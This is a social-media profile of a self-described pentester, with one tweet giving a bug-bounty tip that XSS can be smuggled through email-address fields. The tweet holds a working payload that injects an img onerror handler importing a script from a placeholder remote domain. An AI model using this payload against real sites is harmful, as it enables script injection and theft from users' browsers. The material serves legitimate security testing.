Tabassum
@ehtabbu
Security Researcher | Pentester | Coder 👩💻
ID: 803969319281430528
https://hackerone.com/ehtabbu?type=user 30-11-2016 14:29:57
76 Tweet
2,2K Followers
196 Following
XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@yourdomain .com cc Brute Logic - brutelogic.com.br/blog/xss-limit…